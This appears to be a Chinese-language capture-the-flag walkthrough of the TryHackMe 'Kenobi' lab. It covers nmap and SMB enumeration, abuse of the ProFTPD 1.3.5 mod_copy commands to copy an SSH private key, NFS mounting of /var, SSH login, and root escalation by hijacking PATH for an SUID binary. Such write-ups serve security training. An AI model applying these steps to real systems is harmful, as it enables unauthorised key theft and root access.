0%

TryHackMe-Kenobi

靶机链接:Kenobi
介绍:

This room will cover using accessing a Samba share, manipulating a vulnerable version of proftpd to gain initial access and escalate your privileges to root via an SUID binary.

这个靶机将会向你演示如何访问samba的分享目录,并通过操纵proftpd漏洞获得后门,再通过使用SUID文件使权限提升root用户

靶机难度:简单

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
[email protected]:~# nmap -sV -sC --script vuln -oN kenobi 10.10.187.245
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-11 02:20 UTC
Nmap scan report for ip-10.10.45.140.eu-west-1.compute.internal (10.10.45.140)
Host is up (0.0013s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
|_sslv2-drown:
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /admin.html: Possible admin folder
|_ /robots.txt: Robots file
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 40361/tcp mountd
| 100005 1,2,3 49262/udp mountd
| 100021 1,3,4 43179/tcp nlockmgr
| 100021 1,3,4 56568/udp nlockmgr
| 100227 2,3 2049/tcp nfs_acl
|_ 100227 2,3 2049/udp nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2049/tcp open nfs_acl 2-3 (RPC #100227)
MAC Address: 02:F2:65:5B:D2:FA (Unknown)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 334.90 seconds

根据nmap探测结果,我们可以知道目标机器上有smb服务,http等。

使用nmap smb枚举脚本来查看目前机器分享目录

nmap -p445,139 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.45.140

正常的话,此时应该会有目标机器相关的信息。

类似这样:
01f813f366f30e4be606bdc5e676bf2d.png

可以发现anonymous允许匿名访问

通过smbclient去访问匿名目录
smbclient //10.10.45.140/anonymous

9c957a4d43cc8490c468acb6568d2d93.png
可以发现有个log.txt的文件。
通过smbget 下载anonymous目录下的log.txt
smbget -R smb:10.10.45.150/anonymous/

f1c85bda8ceef55fd002477160061a9c.png
可以发现里面有密钥生成的信息和FTP的相关信息。

前面的nmap探测结果也发现了目标机器有打开111端口。

440107d79c87a75d0992e966b0e24874.png

根据上面的nmap信息探测,我们知道ProFTPD版本是1.3.5
使用searchsploit去搜索有什么存在的漏洞。

searchsploit ProFTPD 1.3.5

2b1490354729155ff812dcf2aa104b60.png

漏洞利用

这里我们利用这个mod_copy漏洞

The mod_copy module implements SITE CPFR and SITE CPTO commands, which can be used to copy files/directories from one place to another on the server. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.
mod_copy
模块实现了SITE CPFR和SITE CPTO命令,可以用来将文件/目录从服务器上的一个地方复制到另一个地方。任何未经认证的客户端都可以利用这些命令将文件从文件系统的任何部分复制到指定路径。

因为在前面,可以看到目标机器允许挂载var目录,所以我们将密钥复制到var目录下

95937e17e82ad0cc70b12ea669317a7f.png

创建一个目录,并远程挂载目标机器的var

1
2
mkdir /mnt/kenobiNFS
mount 10.10.45.140:/var /mnt/kenobiNFS

连接后门

将刚刚复制到/var下的id_rsa,复制到本机。然后使用ssh -i 连接

0bb2c64e5266142e2e202c88aae50af9.png

ssh -i id_rsa [email protected]

7cff46d6c978c10d7721583e20294681.png
拿到flat。

提权

这时候,我们应该考虑提权,去获得第二个flag

Linux系统中,会有部分命令的权限位是rws而不是rwx这些文件被称为SUID文件

SUID 权限仅对二进制可执行文件有效
如果执行者对于该二进制可执行文件具有x的权限,执行者将具有该文件的所有者的权限
本权限仅在执行该二进制可执行文件的过程中有效

所以如果随意设置SUID文件,可能会导致系统很危险。
SGID文件同理,只不过SGID,是出现在用户组的x权限位中。
如果SGID被用于设置文件,在执行该文件时,用户将获得该文件所属组的权限

而SBIT权限只对目录有效,SBIT对目录的作用是:当用户在该目录下创建新文件或目录时,仅有自己和 root 才有权力删除。

关于SUID位的更多资讯check here.

1
find / -perm -u=s -type f 2>/dev/null

通过这条命令,我们会找到一个很特别的拥有root权限的二进制文件。

尝试执行它

7313d92f0d0da0089947bea50de71dba.png

0dac81ee2dd4cf70201bb1f79851a91e.png

This shows us the binary is running without a full path (e.g. not using /usr/bin/curl or /usr/bin/uname).
As this file runs as the root users privileges, we can manipulate our path gain a root shell.

这里我们要先cd到tmp目录。在去将shell重定向到curl
de6edb3f22cfc12374371d4198b3051f.png
拿到flag2